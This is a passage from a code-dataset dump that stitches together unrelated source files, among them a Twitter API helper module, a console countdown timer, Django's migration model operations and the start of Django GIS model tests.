def __init__(self, *, message=None, fileobj=None, keyboard=None,
preview=False, markdown=False, inline=None):
self.message = message
self.fileobj = fileobj
self.keyboard = keyboard
self.preview = preview
self.markdown = markdown
self.inline = inline
```
#### File: JoM/jom/twitter.py
```python
import json
from requests.exceptions import ConnectionError
from rauth import OAuth1Session
_twitter = None
def twitter():
"""Return a session to call twitter api.
:return: a requests session
:rtype: OAuth1Session
"""
global _twitter
if _twitter is None:
globals().update(json.load(open('secret.json')))
_twitter = OAuth1Session(consumer_key=CONSUMER_KEY,
consumer_secret=CONSUMER_SECRET,
access_token=ACCESS_KEY,
access_token_secret=ACCESS_SECRET)
return _twitter
def get_ratelimit():
"""Get twitter api rate limit status.
:return: rate limit for each api
:rtype: Dict
"""
return twitter().get('https://api.twitter.com/1.1/'
'application/rate_limit_status.json').json()
def get_user_info(user_id):
"""Returns a variety of information about the user specified by `user_id`.
    :param str user_id: target's Twitter user id
:rtype: Dict
"""
return twitter().get('https://api.twitter.com/1.1/users/show.json', params=dict(user_id=user_id)).json()
def get_tweets(user_id, max_id=None):
"""Get tweets from one's timeline
    :param str user_id: target's Twitter user id
:param max_id: the id of last tweet in range, defaults to be None
:type max_id: int | None
:return: result from API call, a list of tweets
:rtype: List[Dict]
"""
p = dict(user_id=user_id, count=200,
exclude_replies=False, include_rts=True)
if max_id is not None:
p['max_id'] = max_id
while 1:
try:
r = twitter().get('https://api.twitter.com/1.1'
'/statuses/user_timeline.json',
params=p)
break
except ConnectionError:
pass
return r.json()
def get_f(user_id, ftype):
"""Get one's follower/following
:param str user_id: target's user id
:param str ftype: follower or following
:return: a mapping from follower/following id to screen name
:rtype: Dict
"""
p = dict(user_id=user_id, count=200, stringify_ids=True,
include_user_entities=True, cursor=-1)
f = []
if ftype == 'follower':
resource_uri = 'https://api.twitter.com/1.1/followers/list.json'
elif ftype == 'following':
resource_uri = 'https://api.twitter.com/1.1/friends/list.json'
else:
raise Exception('Unknown type: ' + ftype)
while True:
while 1:
try:
j = twitter().get(resource_uri, params=p).json()
break
except ConnectionError:
pass
if 'errors' in j:
raise Exception(j['errors'])
if 'error' in j:
raise Exception(j['error'])
f.extend([(str(u['id']), u['screen_name']) for u in j['users']])
if j['next_cursor'] != 0:
p['cursor'] = j['next_cursor']
else:
break
return dict(f)
def fetch_conversation(sid):
''' Fetch conversation by tweet id via twitter api.
:param sid: tweet id
:type sid: str | int
:return: list of tweets
:rtype: List[Dict]
'''
threads = twitter().get('https://api.twitter.com/1.1/conversation/show.json',
params=dict(id=sid, include_entities=1)).json()
return [] if 'errors' in threads else threads
def ids2names(ids):
"""Twitter user ids to screen names.
:param List[int] ids: user ids
:return: list of corresponding names
:rtype: List[str]
"""
users = twitter().get('https://api.twitter.com/1.1/friendships/lookup.json',
params=dict(user_id=','.join(map(str, ids)))).json()
names = []
i, n = 0, len(users)
for _id in ids:
if i < n and users[i]['id'] == _id:
names.append(users[i]['screen_name'])
i += 1
else:
names.append(None)
return names
def names2ids(names):
"""Twitter screen names to user ids.
    :param List[str] names: screen names
:return: list of corresponding user ids
:rtype: List[int]
"""
users = twitter().get('https://api.twitter.com/1.1/friendships/lookup.json',
params=dict(screen_name=','.join(map(str, names)))).json()
ids = []
i, n = 0, len(users)
for name in names:
if i < n and users[i]['screen_name'] == name:
ids.append(users[i]['id'])
i += 1
else:
ids.append(None)
return ids
``` |
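The `Resp` container above takes keyword-only arguments; a hypothetical construction inside a command handler:

```python
r = Resp(message='*done*', markdown=True)
assert r.message == '*done*' and r.fileobj is None and not r.preview
```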
{
"source": "jomlearn2/clock",
"score": 4
} |
#### File: jomlearn2/clock/timer.py
```python
from os import system, name
import time
from datetime import datetime, timedelta
# setcount: prompt the user for the countdown duration
def setcount():
global hrs
global mins
global secs
global totalsecs
print('Set the countdown timer:')
hrs = int(input('hours: '))
mins = int(input('minutes: '))
secs = int(input('seconds: '))
totalsecs = 3600 * hrs + 60 * mins + secs
# countdown: run the countdown loop
def countdown():
run = str(input('Start? (y/n) > '))
# Only run if the user types in "y"
if run == "y":
ltotalsecs = totalsecs
while ltotalsecs != 0:
sec = timedelta(seconds=int(ltotalsecs))
d = datetime(1, 1, 1) + sec
print("%d hours %d minutes %d seconds left" % (d.hour, d.minute, d.second))
# delay for a second
time.sleep(1)
# decrement the local seconds total
ltotalsecs -= 1
# clearing the previous statement
clear()
if ltotalsecs == 0:
print('Time is UP!')
# defining clear function
def clear():
# for windows
if name == 'nt':
a = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
setcount()
countdown()
``` |
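The countdown total is plain sexagesimal arithmetic, `3600*h + 60*m + s`:

```python
h, m, s = 1, 30, 15
assert 3600 * h + 60 * m + s == 5415  # 1h30m15s
```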
{
"source": "jommerce/django",
"score": 2
} |
#### File: migrations/operations/models.py
```python
from django.db import models
from django.db.migrations.operations.base import Operation
from django.db.migrations.state import ModelState
from django.db.migrations.utils import field_references, resolve_relation
from django.db.models.options import normalize_together
from django.utils.functional import cached_property
from .fields import AddField, AlterField, FieldOperation, RemoveField, RenameField
def _check_for_duplicates(arg_name, objs):
used_vals = set()
for val in objs:
if val in used_vals:
raise ValueError(
"Found duplicate value %s in CreateModel %s argument." % (val, arg_name)
)
used_vals.add(val)
class ModelOperation(Operation):
def __init__(self, name):
self.name = name
@cached_property
def name_lower(self):
return self.name.lower()
def references_model(self, name, app_label):
return name.lower() == self.name_lower
def reduce(self, operation, app_label):
return super().reduce(operation, app_label) or self.can_reduce_through(
operation, app_label
)
def can_reduce_through(self, operation, app_label):
return not operation.references_model(self.name, app_label)
class CreateModel(ModelOperation):
"""Create a model's table."""
serialization_expand_args = ["fields", "options", "managers"]
def __init__(self, name, fields, options=None, bases=None, managers=None):
self.fields = fields
self.options = options or {}
self.bases = bases or (models.Model,)
self.managers = managers or []
super().__init__(name)
# Sanity-check that there are no duplicated field names, bases, or
# manager names
_check_for_duplicates("fields", (name for name, _ in self.fields))
_check_for_duplicates(
"bases",
(
base._meta.label_lower
if hasattr(base, "_meta")
else base.lower()
if isinstance(base, str)
else base
for base in self.bases
),
)
_check_for_duplicates("managers", (name for name, _ in self.managers))
def deconstruct(self):
kwargs = {
"name": self.name,
"fields": self.fields,
}
if self.options:
kwargs["options"] = self.options
if self.bases and self.bases != (models.Model,):
kwargs["bases"] = self.bases
if self.managers and self.managers != [("objects", models.Manager())]:
kwargs["managers"] = self.managers
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.add_model(
ModelState(
app_label,
self.name,
list(self.fields),
dict(self.options),
tuple(self.bases),
list(self.managers),
)
)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def describe(self):
return "Create %smodel %s" % (
"proxy " if self.options.get("proxy", False) else "",
self.name,
)
@property
def migration_name_fragment(self):
return self.name_lower
def references_model(self, name, app_label):
name_lower = name.lower()
if name_lower == self.name_lower:
return True
# Check we didn't inherit from the model
reference_model_tuple = (app_label, name_lower)
for base in self.bases:
if (
base is not models.Model
and isinstance(base, (models.base.ModelBase, str))
and resolve_relation(base, app_label) == reference_model_tuple
):
return True
# Check we have no FKs/M2Ms with it
for _name, field in self.fields:
if field_references(
(app_label, self.name_lower), field, reference_model_tuple
):
return True
return False
def reduce(self, operation, app_label):
if (
isinstance(operation, DeleteModel)
and self.name_lower == operation.name_lower
and not self.options.get("proxy", False)
):
return []
elif (
isinstance(operation, RenameModel)
and self.name_lower == operation.old_name_lower
):
return [
CreateModel(
operation.new_name,
fields=self.fields,
options=self.options,
bases=self.bases,
managers=self.managers,
),
]
elif (
isinstance(operation, AlterModelOptions)
and self.name_lower == operation.name_lower
):
options = {**self.options, **operation.options}
for key in operation.ALTER_OPTION_KEYS:
if key not in operation.options:
options.pop(key, None)
return [
CreateModel(
self.name,
fields=self.fields,
options=options,
bases=self.bases,
managers=self.managers,
),
]
elif (
isinstance(operation, AlterModelManagers)
and self.name_lower == operation.name_lower
):
return [
CreateModel(
self.name,
fields=self.fields,
options=self.options,
bases=self.bases,
managers=operation.managers,
),
]
elif (
isinstance(operation, AlterTogetherOptionOperation)
and self.name_lower == operation.name_lower
):
return [
CreateModel(
self.name,
fields=self.fields,
options={
**self.options,
**{operation.option_name: operation.option_value},
},
bases=self.bases,
managers=self.managers,
),
]
elif (
isinstance(operation, AlterOrderWithRespectTo)
and self.name_lower == operation.name_lower
):
return [
CreateModel(
self.name,
fields=self.fields,
options={
**self.options,
"order_with_respect_to": operation.order_with_respect_to,
},
bases=self.bases,
managers=self.managers,
),
]
elif (
isinstance(operation, FieldOperation)
and self.name_lower == operation.model_name_lower
):
if isinstance(operation, AddField):
return [
CreateModel(
self.name,
fields=self.fields + [(operation.name, operation.field)],
options=self.options,
bases=self.bases,
managers=self.managers,
),
]
elif isinstance(operation, AlterField):
return [
CreateModel(
self.name,
fields=[
(n, operation.field if n == operation.name else v)
for n, v in self.fields
],
options=self.options,
bases=self.bases,
managers=self.managers,
),
]
elif isinstance(operation, RemoveField):
options = self.options.copy()
for option_name in ("unique_together", "index_together"):
option = options.pop(option_name, None)
if option:
option = set(
filter(
bool,
(
tuple(
f for f in fields if f != operation.name_lower
)
for fields in option
),
)
)
if option:
options[option_name] = option
order_with_respect_to = options.get("order_with_respect_to")
if order_with_respect_to == operation.name_lower:
del options["order_with_respect_to"]
return [
CreateModel(
self.name,
fields=[
(n, v)
for n, v in self.fields
if n.lower() != operation.name_lower
],
options=options,
bases=self.bases,
managers=self.managers,
),
]
elif isinstance(operation, RenameField):
options = self.options.copy()
for option_name in ("unique_together", "index_together"):
option = options.get(option_name)
if option:
options[option_name] = {
tuple(
operation.new_name if f == operation.old_name else f
for f in fields
)
for fields in option
}
order_with_respect_to = options.get("order_with_respect_to")
if order_with_respect_to == operation.old_name:
options["order_with_respect_to"] = operation.new_name
return [
CreateModel(
self.name,
fields=[
(operation.new_name if n == operation.old_name else n, v)
for n, v in self.fields
],
options=options,
bases=self.bases,
managers=self.managers,
),
]
return super().reduce(operation, app_label)
class DeleteModel(ModelOperation):
"""Drop a model's table."""
def deconstruct(self):
kwargs = {
"name": self.name,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.remove_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def references_model(self, name, app_label):
# The deleted model could be referencing the specified model through
# related fields.
return True
def describe(self):
return "Delete model %s" % self.name
@property
def migration_name_fragment(self):
return "delete_%s" % self.name_lower
class RenameModel(ModelOperation):
"""Rename a model."""
def __init__(self, old_name, new_name):
self.old_name = old_name
self.new_name = new_name
super().__init__(old_name)
@cached_property
def old_name_lower(self):
return self.old_name.lower()
@cached_property
def new_name_lower(self):
return self.new_name.lower()
def deconstruct(self):
kwargs = {
"old_name": self.old_name,
"new_name": self.new_name,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.rename_model(app_label, self.old_name, self.new_name)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.new_name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.old_name)
old_db_table = old_model._meta.db_table
new_db_table = new_model._meta.db_table
# Don't alter when a table name is not changed.
if old_db_table == new_db_table:
return
# Move the main table
schema_editor.alter_db_table(new_model, old_db_table, new_db_table)
# Alter the fields pointing to us
for related_object in old_model._meta.related_objects:
if related_object.related_model == old_model:
model = new_model
related_key = (app_label, self.new_name_lower)
else:
model = related_object.related_model
related_key = (
related_object.related_model._meta.app_label,
related_object.related_model._meta.model_name,
)
to_field = to_state.apps.get_model(*related_key)._meta.get_field(
related_object.field.name
)
schema_editor.alter_field(
model,
related_object.field,
to_field,
)
# Rename M2M fields whose name is based on this model's name.
fields = zip(
old_model._meta.local_many_to_many, new_model._meta.local_many_to_many
)
for (old_field, new_field) in fields:
# Skip self-referential fields as these are renamed above.
if (
new_field.model == new_field.related_model
or not new_field.remote_field.through._meta.auto_created
):
continue
# Rename the M2M table that's based on this model's name.
old_m2m_model = old_field.remote_field.through
new_m2m_model = new_field.remote_field.through
schema_editor.alter_db_table(
new_m2m_model,
old_m2m_model._meta.db_table,
new_m2m_model._meta.db_table,
)
# Rename the column in the M2M table that's based on this
# model's name.
schema_editor.alter_field(
new_m2m_model,
old_m2m_model._meta.get_field(old_model._meta.model_name),
new_m2m_model._meta.get_field(new_model._meta.model_name),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
self.new_name_lower, self.old_name_lower = (
self.old_name_lower,
self.new_name_lower,
)
self.new_name, self.old_name = self.old_name, self.new_name
self.database_forwards(app_label, schema_editor, from_state, to_state)
self.new_name_lower, self.old_name_lower = (
self.old_name_lower,
self.new_name_lower,
)
self.new_name, self.old_name = self.old_name, self.new_name
def references_model(self, name, app_label):
return (
name.lower() == self.old_name_lower or name.lower() == self.new_name_lower
)
def describe(self):
return "Rename model %s to %s" % (self.old_name, self.new_name)
@property
def migration_name_fragment(self):
return "rename_%s_%s" % (self.old_name_lower, self.new_name_lower)
def reduce(self, operation, app_label):
if (
isinstance(operation, RenameModel)
and self.new_name_lower == operation.old_name_lower
):
return [
RenameModel(
self.old_name,
operation.new_name,
),
]
# Skip `ModelOperation.reduce` as we want to run `references_model`
# against self.new_name.
return super(ModelOperation, self).reduce(
operation, app_label
) or not operation.references_model(self.new_name, app_label)
class ModelOptionOperation(ModelOperation):
def reduce(self, operation, app_label):
if (
isinstance(operation, (self.__class__, DeleteModel))
and self.name_lower == operation.name_lower
):
return [operation]
return super().reduce(operation, app_label)
class AlterModelTable(ModelOptionOperation):
"""Rename a model's table."""
def __init__(self, name, table):
self.table = table
super().__init__(name)
def deconstruct(self):
kwargs = {
"name": self.name,
"table": self.table,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.alter_model_options(app_label, self.name_lower, {"db_table": self.table})
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
# Rename M2M fields whose name is based on this model's db_table
for (old_field, new_field) in zip(
old_model._meta.local_many_to_many, new_model._meta.local_many_to_many
):
if new_field.remote_field.through._meta.auto_created:
schema_editor.alter_db_table(
new_field.remote_field.through,
old_field.remote_field.through._meta.db_table,
new_field.remote_field.through._meta.db_table,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def describe(self):
return "Rename table for %s to %s" % (
self.name,
self.table if self.table is not None else "(default)",
)
@property
def migration_name_fragment(self):
return "alter_%s_table" % self.name_lower
class AlterTogetherOptionOperation(ModelOptionOperation):
option_name = None
def __init__(self, name, option_value):
if option_value:
option_value = set(normalize_together(option_value))
setattr(self, self.option_name, option_value)
super().__init__(name)
@cached_property
def option_value(self):
return getattr(self, self.option_name)
def deconstruct(self):
kwargs = {
"name": self.name,
self.option_name: self.option_value,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.alter_model_options(
app_label,
self.name_lower,
{self.option_name: self.option_value},
)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
alter_together = getattr(schema_editor, "alter_%s" % self.option_name)
alter_together(
new_model,
getattr(old_model._meta, self.option_name, set()),
getattr(new_model._meta, self.option_name, set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_field(self, model_name, name, app_label):
return self.references_model(model_name, app_label) and (
not self.option_value
or any((name in fields) for fields in self.option_value)
)
def describe(self):
return "Alter %s for %s (%s constraint(s))" % (
self.option_name,
self.name,
len(self.option_value or ""),
)
@property
def migration_name_fragment(self):
return "alter_%s_%s" % (self.name_lower, self.option_name)
def can_reduce_through(self, operation, app_label):
return super().can_reduce_through(operation, app_label) or (
isinstance(operation, AlterTogetherOptionOperation)
and type(operation) is not type(self)
)
class AlterUniqueTogether(AlterTogetherOptionOperation):
"""
Change the value of unique_together to the target one.
Input value of unique_together must be a set of tuples.
"""
option_name = "unique_together"
def __init__(self, name, unique_together):
super().__init__(name, unique_together)
class AlterIndexTogether(AlterTogetherOptionOperation):
"""
Change the value of index_together to the target one.
Input value of index_together must be a set of tuples.
"""
option_name = "index_together"
def __init__(self, name, index_together):
super().__init__(name, index_together)
class AlterOrderWithRespectTo(ModelOptionOperation):
"""Represent a change with the order_with_respect_to option."""
option_name = "order_with_respect_to"
def __init__(self, name, order_with_respect_to):
self.order_with_respect_to = order_with_respect_to
super().__init__(name)
def deconstruct(self):
kwargs = {
"name": self.name,
"order_with_respect_to": self.order_with_respect_to,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.alter_model_options(
app_label,
self.name_lower,
{self.option_name: self.order_with_respect_to},
)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
to_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, to_model):
from_model = from_state.apps.get_model(app_label, self.name)
# Remove a field if we need to
if (
from_model._meta.order_with_respect_to
and not to_model._meta.order_with_respect_to
):
schema_editor.remove_field(
from_model, from_model._meta.get_field("_order")
)
# Add a field if we need to (altering the column is untouched as
# it's likely a rename)
elif (
to_model._meta.order_with_respect_to
and not from_model._meta.order_with_respect_to
):
field = to_model._meta.get_field("_order")
if not field.has_default():
field.default = 0
schema_editor.add_field(
from_model,
field,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_field(self, model_name, name, app_label):
return self.references_model(model_name, app_label) and (
self.order_with_respect_to is None or name == self.order_with_respect_to
)
def describe(self):
return "Set order_with_respect_to on %s to %s" % (
self.name,
self.order_with_respect_to,
)
@property
def migration_name_fragment(self):
return "alter_%s_order_with_respect_to" % self.name_lower
class AlterModelOptions(ModelOptionOperation):
"""
Set new model options that don't directly affect the database schema
(like verbose_name, permissions, ordering). Python code in migrations
may still need them.
"""
# Model options we want to compare and preserve in an AlterModelOptions op
ALTER_OPTION_KEYS = [
"base_manager_name",
"default_manager_name",
"default_related_name",
"get_latest_by",
"managed",
"ordering",
"permissions",
"default_permissions",
"select_on_save",
"verbose_name",
"verbose_name_plural",
]
def __init__(self, name, options):
self.options = options
super().__init__(name)
def deconstruct(self):
kwargs = {
"name": self.name,
"options": self.options,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.alter_model_options(
app_label,
self.name_lower,
self.options,
self.ALTER_OPTION_KEYS,
)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
pass
def database_backwards(self, app_label, schema_editor, from_state, to_state):
pass
def describe(self):
return "Change Meta options on %s" % self.name
@property
def migration_name_fragment(self):
return "alter_%s_options" % self.name_lower
class AlterModelManagers(ModelOptionOperation):
"""Alter the model's managers."""
serialization_expand_args = ["managers"]
def __init__(self, name, managers):
self.managers = managers
super().__init__(name)
def deconstruct(self):
return (self.__class__.__qualname__, [self.name, self.managers], {})
def state_forwards(self, app_label, state):
state.alter_model_managers(app_label, self.name_lower, self.managers)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
pass
def database_backwards(self, app_label, schema_editor, from_state, to_state):
pass
def describe(self):
return "Change managers on %s" % self.name
@property
def migration_name_fragment(self):
return "alter_%s_managers" % self.name_lower
class IndexOperation(Operation):
option_name = "indexes"
@cached_property
def model_name_lower(self):
return self.model_name.lower()
class AddIndex(IndexOperation):
"""Add an index on a model."""
def __init__(self, model_name, index):
self.model_name = model_name
if not index.name:
raise ValueError(
"Indexes passed to AddIndex operations require a name "
"argument. %r doesn't have one." % index
)
self.index = index
def state_forwards(self, app_label, state):
state.add_index(app_label, self.model_name_lower, self.index)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.add_index(model, self.index)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.remove_index(model, self.index)
def deconstruct(self):
kwargs = {
"model_name": self.model_name,
"index": self.index,
}
return (
self.__class__.__qualname__,
[],
kwargs,
)
def describe(self):
if self.index.expressions:
return "Create index %s on %s on model %s" % (
self.index.name,
", ".join([str(expression) for expression in self.index.expressions]),
self.model_name,
)
return "Create index %s on field(s) %s of model %s" % (
self.index.name,
", ".join(self.index.fields),
self.model_name,
)
@property
def migration_name_fragment(self):
return "%s_%s" % (self.model_name_lower, self.index.name.lower())
class RemoveIndex(IndexOperation):
"""Remove an index from a model."""
def __init__(self, model_name, name):
self.model_name = model_name
self.name = name
def state_forwards(self, app_label, state):
state.remove_index(app_label, self.model_name_lower, self.name)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
from_model_state = from_state.models[app_label, self.model_name_lower]
index = from_model_state.get_index_by_name(self.name)
schema_editor.remove_index(model, index)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
to_model_state = to_state.models[app_label, self.model_name_lower]
index = to_model_state.get_index_by_name(self.name)
schema_editor.add_index(model, index)
def deconstruct(self):
kwargs = {
"model_name": self.model_name,
"name": self.name,
}
return (
self.__class__.__qualname__,
[],
kwargs,
)
def describe(self):
return "Remove index %s from %s" % (self.name, self.model_name)
@property
def migration_name_fragment(self):
return "remove_%s_%s" % (self.model_name_lower, self.name.lower())
class AddConstraint(IndexOperation):
option_name = "constraints"
def __init__(self, model_name, constraint):
self.model_name = model_name
self.constraint = constraint
def state_forwards(self, app_label, state):
state.add_constraint(app_label, self.model_name_lower, self.constraint)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.add_constraint(model, self.constraint)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.remove_constraint(model, self.constraint)
def deconstruct(self):
return (
self.__class__.__name__,
[],
{
"model_name": self.model_name,
"constraint": self.constraint,
},
)
def describe(self):
return "Create constraint %s on model %s" % (
self.constraint.name,
self.model_name,
)
@property
def migration_name_fragment(self):
return "%s_%s" % (self.model_name_lower, self.constraint.name.lower())
class RemoveConstraint(IndexOperation):
option_name = "constraints"
def __init__(self, model_name, name):
self.model_name = model_name
self.name = name
def state_forwards(self, app_label, state):
state.remove_constraint(app_label, self.model_name_lower, self.name)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
from_model_state = from_state.models[app_label, self.model_name_lower]
constraint = from_model_state.get_constraint_by_name(self.name)
schema_editor.remove_constraint(model, constraint)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
to_model_state = to_state.models[app_label, self.model_name_lower]
constraint = to_model_state.get_constraint_by_name(self.name)
schema_editor.add_constraint(model, constraint)
def deconstruct(self):
return (
self.__class__.__name__,
[],
{
"model_name": self.model_name,
"name": self.name,
},
)
def describe(self):
return "Remove constraint %s from model %s" % (self.name, self.model_name)
@property
def migration_name_fragment(self):
return "remove_%s_%s" % (self.model_name_lower, self.name.lower())
```
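The `reduce()` hooks above are what Django's migration optimizer drives when it squashes operation lists. A minimal sketch (the `Pony` model and the `"app"` label are hypothetical; `MigrationOptimizer` is the real entry point):
```python
from django.db import models
from django.db.migrations.operations import AddField, CreateModel
from django.db.migrations.optimizer import MigrationOptimizer

# CreateModel followed by AddField on the same model collapses into a
# single CreateModel carrying both fields, via CreateModel.reduce().
ops = [
    CreateModel("Pony", fields=[("id", models.AutoField(primary_key=True))]),
    AddField("Pony", "weight", models.IntegerField(default=0)),
]
optimized = MigrationOptimizer().optimize(ops, app_label="app")
assert len(optimized) == 1 and isinstance(optimized[0], CreateModel)
```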
#### File: gis_tests/geoapp/tests.py
```python
import tempfile
from io import StringIO
from django.contrib.gis import gdal
from django.contrib.gis.db.models import Extent, MakeLine, Union, functions
from django.contrib.gis.geos import (
GeometryCollection,
GEOSGeometry,
LinearRing,
LineString,
MultiLineString,
MultiPoint,
MultiPolygon,
Point,
Polygon,
fromstr,
)
from django.core.management import call_command
from django.db import DatabaseError, NotSupportedError, connection
from django.db.models import F, OuterRef, Subquery
from django.test import TestCase, skipUnlessDBFeature
from django.test.utils import CaptureQueriesContext
from ..utils import skipUnlessGISLookup
from .models import (
City,
Country,
Feature,
MinusOneSRID,
MultiFields,
NonConcreteModel,
PennsylvaniaCity,
State,
Track,
)
class GeoModelTest(TestCase):
fixtures = ["initial"]
def test_fixtures(self):
"Testing geographic model initialization from fixtures."
# Ensuring that data was loaded from initial data fixtures.
self.assertEqual(2, Country.objects.count())
self.assertEqual(8, City.objects.count())
self.assertEqual(2, State.objects.count())
def test_proxy(self):
"Testing Lazy-Geometry support (using the GeometryProxy)."
# Testing on a Point
pnt = Point(0, 0)
nullcity = City(name="NullCity", point=pnt)
nullcity.save()
# Making sure TypeError is thrown when trying to set with an
# incompatible type.
for bad in [5, 2.0, LineString((0, 0), (1, 1))]:
with self.assertRaisesMessage(TypeError, "Cannot set"):
nullcity.point = bad
# Now setting with a compatible GEOS Geometry, saving, and ensuring
# the save took, notice no SRID is explicitly set.
new = Point(5, 23)
nullcity.point = new
# Ensuring that the SRID is automatically set to that of the
# field after assignment, but before saving.
self.assertEqual(4326, nullcity.point.srid)
nullcity.save()
# Ensuring the point was saved correctly after saving
self.assertEqual(new, City.objects.get(name="NullCity").point)
# Setting the X and Y of the Point
nullcity.point.x = 23
nullcity.point.y = 5
# Checking assignments pre & post-save.
self.assertNotEqual(
Point(23, 5, srid=4326), City.objects.get(name="NullCity").point
)
nullcity.save()
self.assertEqual(
Point(23, 5, srid=4326), City.objects.get(name="NullCity").point
)
nullcity.delete()
# Testing on a Polygon
shell = LinearRing((0, 0), (0, 90), (100, 90), (100, 0), (0, 0))
inner = LinearRing((40, 40), (40, 60), (60, 60), (60, 40), (40, 40))
# Creating a State object using a built Polygon
ply = Polygon(shell, inner)
nullstate = State(name="NullState", poly=ply)
self.assertEqual(4326, nullstate.poly.srid) # SRID auto-set from None
nullstate.save()
ns = State.objects.get(name="NullState")
self.assertEqual(connection.ops.Adapter._fix_polygon(ply), ns.poly)
# Testing the `ogr` and `srs` lazy-geometry properties.
self.assertIsInstance(ns.poly.ogr, gdal.OGRGeometry)
self.assertEqual(ns.poly.wkb, ns.poly.ogr.wkb)
self.assertIsInstance(ns.poly.srs, gdal.SpatialReference)
self.assertEqual("WGS 84", ns.poly.srs.name)
# Changing the interior ring on the poly attribute.
new_inner = LinearRing((30, 30), (30, 70), (70, 70), (70, 30), (30, 30))
ns.poly[1] = new_inner
ply[1] = new_inner
self.assertEqual(4326, ns.poly.srid)
ns.save()
self.assertEqual(
connection.ops.Adapter._fix_polygon(ply),
State.objects.get(name="NullState").poly,
)
ns.delete()
@skipUnlessDBFeature("supports_transform")
def test_lookup_insert_transform(self):
"Testing automatic transform for lookups and inserts."
# San Antonio in 'WGS84' (SRID 4326)
sa_4326 = "POINT (-98.493183 29.424170)"
wgs_pnt = fromstr(sa_4326, srid=4326) # Our reference point in WGS84
# San Antonio in 'WGS 84 / Pseudo-Mercator' (SRID 3857)
other_srid_pnt = wgs_pnt.transform(3857, clone=True)
# Constructing & querying with a point from a different SRID. Oracle
# `SDO_OVERLAPBDYINTERSECT` operates differently from
# `ST_Intersects`, so contains is used instead.
if connection.ops.oracle:
tx = Country.objects.get(mpoly__contains=other_srid_pnt)
else:
tx = Country.objects.get(mpoly__intersects=other_srid_pnt)
self.assertEqual("Texas", tx.name)
# Creating San Antonio. Remember the Alamo.
sa = City.objects.create(name="San Antonio", point=other_srid_pnt)
# Now verifying that San Antonio was transformed correctly
sa = City.objects.get(name="San Antonio")
self.assertAlmostEqual(wgs_pnt.x, sa.point.x, 6)
self.assertAlmostEqual(wgs_pnt.y, sa.point.y, 6)
# If the GeometryField SRID is -1, then we shouldn't perform any
# transformation if the SRID of the input geometry is different.
m1 = MinusOneSRID(geom=Point(17, 23, srid=4326))
m1.save()
self.assertEqual(-1, m1.geom.srid)
def test_createnull(self):
"Testing creating a model instance and the geometry being None"
c = City()
self.assertIsNone(c.point)
def test_geometryfield(self):
"Testing the general GeometryField."
Feature(name="Point", geom=Point(1, 1)).save()
Feature(name="LineString", geom=LineString((0, 0), (1, 1), (5, 5))).save()
Feature(
name="Polygon",
